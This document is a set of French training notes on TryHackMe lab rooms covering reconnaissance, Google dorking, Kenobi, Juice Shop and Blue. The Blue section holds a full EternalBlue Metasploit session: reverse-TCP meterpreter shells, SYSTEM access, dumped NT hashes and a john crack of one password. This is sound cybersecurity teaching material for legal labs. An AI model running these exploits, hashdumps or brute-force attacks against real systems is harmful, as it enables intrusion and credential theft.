# Try Hack Me 

## Les attaques informatiques

### Contexte

> La sécurité informatique est un vaste sujet, car tous les perimetre sont impactés :

- Les réseaux
- Les machines Linux & Windows
- Les logiciels et les services
- Même les humains !

Il est quasiment impossible de trouver une personne qui maîtrise parfaitements l'ensemble d'un domaine de la sécurité informatique.

Il existe plutôt des spécialistes pour chaque périmètre.

Il est nécessaire pour un dev/ops de connaitre la philosophie et l'approche des hackers afins de se protéger de la plupart des attaques.

Pour préparer une attaque, on doit récolter et analyser les in informations de la machine ciblée :

- Adresse IP
- Ports ouverts
- Nom et version du système d'exploitation
- Nom et version des services exposés

Les système d'informations parlent trop !

Par exemple lorsque l'on fait une requête à un server web, celui-ci peut répondre en donnant le nom du serveur et sa version.

De nombreux outils existent et permettent très rapidement d'extraire un maximum d'information sur une cible : ping, nmap, traceroute, ...

Il existe un dictionnaire qui liste toutes les vulnérabilités connues d'un service ou d'un logiciel.

Il s'agit de la liste CVE pour "Common Vulnerabilities and Exposures".

Une fois que la reconnaissance est terminée et qu'un faille a été identifiée, l'attauqe peut être élaborée, mais seulement dans un cadre légal!

## TRYHACKME INTRODUCTION

### LA PLATEFORME TRYHACKME

Pour cette journée sous le thème de la sécurité et des attaques informatiques, vous aurez l’occasion de vous entraîner la plateforme TryHackMe qui est dédiée à l'apprentissage et à la pratique de la cybersécurité, via laboratoires pratiques et proches de la réalité.


Certains exercices de la plateforme seront sous forme de quiz, tandis que d’autres (plus complets et stimulants) nécessitent la manipulation d’un environnement distant auquel il faudra se connecter via un VPN.


- 👉 Créez un compte sur la plateforme TryHackMe.

- 👉 Commencez par la découverte d’OpenVPN, un client VPN qui vous permettra de vous connecter au réseau de TryHackMe afin de manipuler certains environnements distants : https://tryhackme.com/room/openvpn
    - Naviguez jusqu'a https://tryhackme.com/access
    - Téléchargé l'archive openvpn sur votre ordinateur
    - Importer la dans openvpn (apt install openvpn)
    - Verifier a l'aide des exo suivant si la connexion est fonctionnel

- 👉 Maintenant que vous êtes aptes à vous connecter au réseau de TryHackMe, apprenez à utiliser la plateforme à travers la room suivante : https://tryhackme.com/room/tutorial
    - Verifié que votre connexion openvpn soit bien active (ip a)
    - Rendez-vous sur le l'ip de la machine a l'aide de votre navigateur

## Let Me Google That For You

### L’IMPORTANCE DE GOOGLE

Au cas où vous ne l’avez pas remarqué depuis le début de votre formation, l’utilisation du moteur de recherche Google est primordiale dans votre apprentissage : recherche de commandes, d’erreurs, de documentation… c’est une étape incontournable pour tout bon DevOps, mais aussi dans le domaine de la sécurité informatique !


👉 Commencez par une brève introduction aux compétences de recherche pour le pentesting (test d’intrustion) : https://tryhackme.com/room/introtoresearch 

- Les base de la Steganography
    - Il es possible de cacher des information a l'intérieur d'image(ou d'autre media)
    - Découverte de l'outils steghide
        - Comment l'installer (apt install steghide)
        - Comment l'utiliser (man steghide)
- Les base de la recherche de vulnérabilité
    - [Exploit db](https://www.exploit-db.com/)
        - Moteur de recherche pour les exploit connue 
    - [NVD](https://nvd.nist.gov/vuln/search)
        - Moteur de recherche pour les vulnérabilités connue
    - [CVE Mitre](https://cve.mitre.org/)
        - Base de connaisance SOC mitre(si j'ai bien compris)
- Les manuel linux(vue dans les anciens cours 'man prg')

👉 Découvrez le fonctionnement avancé des moteurs de recherche afin de trouver du contenu caché : https://tryhackme.com/room/googledorking

#### Fonctionement des moteur de recherche

##### Les crawlers

Il vont récolté des informations disponible publiquement sur internet de diverse manière.

Il vont ensuite essayer d'extraire un maximum d'information sous forme de mots clé ainsi que suivre tout les lien présents.

Pour aider les crawlers a référencé leur site les administrateur peut mettre en place un robot.txt et un sitemap.xml.

Les Crawlers fond une sorte de photo d'internet afin de le rendre disponible pour tous sous forme de mots clé

##### Les moteurs de recherche

Les moteurs de recherche vont faire le lien entre l'humain et cette base de données

Dans les moteurs de recherche comme goole l'objectifs et de renvoyer un bout du contenue de la page contenant les mots clées ainsi qu'un lien hypertext afin de pouvoir naviguez de manière aisé sur internet.

Afin d'être mieux référecé par ces moteurs de recherche, il es possible d'indiqué les acces au crawlers via le robot.txt et l'arborésence du site dans sitemap.xml

```robot.txt
User-agent: Googlebot
Disallow: /
Disallow: /*.conf$
```

```sitemap.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://www.example.com/page.html</loc>
  </url>
</urlset>

```

#### Google dorking

Afin de ciblé la recherche google nous permet de passer de parametre dans la requete.

Term | Action
------|------
filetype: | Search for a file by its extension (e.g. PDF)
cache: | View Google's Cached version of a specified URL
intitle: | The specified phrase MUST appear in the title of the page
site: | permet de cibler une url

## PASSIVE & ACTIVE RECONS

### RECONNAISSANCE PASSIVE & ACTIVE

Vous brûlez d’envie d’attaquer votre première machine n’est-ce pas ? Encore un peu de patience !
La compréhension des attaques informatiques passe par la maîtrise des concepts de base : vous avez précédemment vu l’importance de la recherche, vous allez maintenant découvrir la première étape dédiée à la reconnaissance et la collecte d’informations.


👉 Découvrez les outils essentiels à la reconnaissance passive tels que whois, nslookup et dig : https://tryhackme.com/room/passiverecon

- Reconaissance grace au registre dns
    - Les commande nslookup, dig, whois sont utilisé pour faire de la reconaissance de dns
    - Il existe aussi des service web comme dnsdumpster qui nous permettent de modélisé les infomation de ses serveur.
- Shodan.io
    - Ce meteur de recherche permet de rechercher n'importe quelle objet vulnérable sur internet

👉 Passez à la reconnaissance active via des outils tels que traceroute, ping, telnet afin de recueillir des informations : https://tryhackme.com/room/activerecon

Cette room nécessite la connexion au réseau de TryHackMe via OpenVPN.

- Notre navigateur est très puissant (active recon)
    - Il embarque des outils de dévelopeur intégré qui peuvent nous données des informations
    - Il est aussi possible de rajouter de plugins afin d'avoir plus d'information ou dans une autre forme
- Fonctionalité active de détéction
    - Les commande ping font un teste de communication avec la machine distant
    - Traceroute indique a chaque routeur intérmediaire de données une réponse
    - Telnet anciennement utilisé pour établir des connexion a distance
    - Netcat, le couteau swiss réseau pour les connexion, les transfert ect
        - Tout les outils abordé ici sont sujet a changer avec le temps
        - Il est aussi possible de développer les sien

## KENOBI

### ATTAQUE D’UNE MACHINE LINUX

Place à l'exploitation d'une machine Linux ! Vous allez vous attaquer à un serveur de stockage de fichier doté d’une service qui n’est plus à jour et plus précisément doté d’une version comportant une faille critique.


👉 Suivez les instructions de la room Kenobi afin d'accéder à l’utilisateur root via une élévation des privilèges : https://tryhackme.com/room/kenobi

- Active recon 

`nmap -p-2500 $ip`

- Enuméré les partage fichier
    - nmap est aussi capable d'éxecuter des script afin de faire de la reconnaisance encore plus active voir de l'attaque

`nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $ip`

- Recherche de vulérabilité

```
root@ip-10-10-164-110:~# nmap -p-1000 -sV 10.10.75.47

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-05 14:31 BST
Nmap scan report for ip-10-10-75-47.eu-west-1.compute.internal (10.10.75.47)
Host is up (0.0013s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp open  rpcbind     2-4 (RPC #100000)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:D4:A0:BE:42:13 (Unknown)
```

```
root@ip-10-10-164-110:~# searchsploit ProFTPD 1.3.5
[i] Found (#2): /opt/searchsploit/files_exploits.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#2): /opt/searchsploit/files_shellcodes.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)             | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                   | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                             | linux/remote/36742.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

- Elevation de privilegre grace au SUID

- Sur linux il est possible grace au suid de laisser une certaine personne executer une commande qui necessite un privilege administrateur

Permission | On Files | On Directories
SUID Bit | User executes the file with permissions of the file owner | -
SGID Bit | User executes the file with the permission of the group owner. | File created in directory gets the same group owner.
Sticky Bit | No meaning | Users are prevented from deleting files from other users.

- Mappé tout les fichier 'find / perm /4000'

## OWASP

### ATTAQUE D’UN SITE WEB

La difficulté monte d’un cran (et peut être même deux…) puisque vous allez vous confronter à une room bien connue dans la communauté des pentesteurs :un environnement web truffé de vulnérabilités et créé par la fondation OWASP.


- 👉 Attaquez-vous à l'application web vulnérable Juice Shop afin d’apprendre à identifier et à exploiter les vulnérabilités courantes des applications web : https://tryhackme.com/room/owaspjuiceshop


- Voici quelques aides et indications qui vous seront certainement utiles pour venir à bout de cette room :
	- Vous serez amené à mener une attaque bruteforce afin de trouver un mot de passe, nous vous conseillons d’utiliser ce "dictionnaire" : https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/best1050.txt 
	- Sur Burp Suite, l’attaque bruteforce par dictionnaire est limitée et peut prendre jusqu’à 10 minutes afin de trouver le bon mot de passe
	- Pour la complétion des tasks 6 et 7, vous devez retourner sur un navigateur hors Burp Suite afin de récupérer les flags (ou aller directement sur la plage leaderboard si ça ne s’affiche toujours pas)

Type d'injection | Explication
------|------
SQL Injection | SQL Injection is when an attacker enters a malicious or malformed query to either retrieve or tamper data from a database. And in some cases, log into accounts.
Command Injection | Command Injection is when web applications take input or user-controlled data and run them as system commands. An attacker may tamper with this data to execute their own system commands. This can be seen in applications that perform misconfigured ping tests. 
Email Injection | Email injection is a security vulnerability that allows malicious users to send email messages without prior authorization by the email server. These occur when the attacker adds extra data to fields, which are not interpreted by the server correctly.

## Blue

### ATTAQUE D’UNE MACHINE WINDOWS

Si vous êtes arrivé jusqu’à ce challenge, félicitations, mais surtout bon courage pour cette ultime room basée sur le fameux système d’exploitation de Microsoft.


- 👉 Commencez par l’introduction aux principaux composants et fonctionnalités de l’outil Metasploit : https://tryhackme.com/room/metasploitintro
    - Les mordules metasploit
        - Auxiliary
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/auxiliary/ 
        - Encoders
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/encoders/ 
        - Evasion
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/evasion/ 
        - Exploits
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/exploits/
        - NOPs
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/nops/
        - Payloads
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/payloads/
        - Post
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/post/

- 👉 Une fois que vous maitrisez un peu plus l’outil Metasploit, attaquez-vous à une machine Windows en tirant parti des problèmes courants de mauvaise configuration : https://tryhackme.com/room/blue

- La cosole msfvenom
    - Il embarque tout un panel de commande
    - Ainsi que toute les fonctionalité de metasploit

N’hésitez pas à débloquer les aides et solutions ci-dessous si vous êtes bloqué lors d’une étape particulière 😉

```
root@ip-10-10-30-220:~# nmap -p-1000 -sV --script=vuln 10.10.57.179

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-05 16:05 BST
Nmap scan report for ip-10-10-57-179.eu-west-1.compute.internal (10.10.57.179)
Host is up (0.012s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 02:69:05:E3:0E:9B (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.73 seconds
```

```
root@ip-10-10-30-220:~# msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
m
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.57.179 
RHOSTS => 10.10.57.179
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.30.220:4444 
[*] 10.10.57.179:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.57.179:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.57.179:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.57.179:445 - The target is vulnerable.
[*] 10.10.57.179:445 - Connecting to target for exploitation.
[+] 10.10.57.179:445 - Connection established for exploitation.
[+] 10.10.57.179:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.57.179:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.57.179:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.57.179:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.57.179:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.57.179:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.57.179:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.57.179:445 - Sending all but last fragment of exploit packet
[*] 10.10.57.179:445 - Starting non-paged pool grooming
[+] 10.10.57.179:445 - Sending SMBv2 buffers
[+] 10.10.57.179:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.57.179:445 - Sending final SMBv2 buffers.
[*] 10.10.57.179:445 - Sending last fragment of exploit packet!
[*] 10.10.57.179:445 - Receiving response from exploit packet
[+] 10.10.57.179:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.57.179:445 - Sending egg to corrupted connection.
[*] 10.10.57.179:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.57.179
[*] Meterpreter session 1 opened (10.10.30.220:4444 -> 10.10.57.179:49251) at 2023-04-05 17:04:26 +0100
[+] 10.10.57.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.57.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.57.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
Background session 1? [y/N]  y
[-] Unknown command: y
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.30.220:4433 
[*] Post module execution completed
[*] Sending stage (200774 bytes) to 10.10.57.179
[*] Meterpreter session 2 opened (10.10.30.220:4433 -> 10.10.57.179:49254) at 2023-04-05 17:06:10 +0100
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1860 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>exit
exit
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

root@ip-10-10-30-220:~# john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)

meterpreter > search -f flag*.txt | cat
Found 3 results...
==================

Path                                  Size (bytes)  Modified (UTC)
----                                  ------------  --------------
c:\Users\Jon\Documents\flag3.txt      37            2019-03-17 19:26:36 +0000
c:\Windows\System32\config\flag2.txt  34            2019-03-17 19:32:48 +0000
c:\flag1.txt                          24            2019-03-17 19:27:21 +0000

```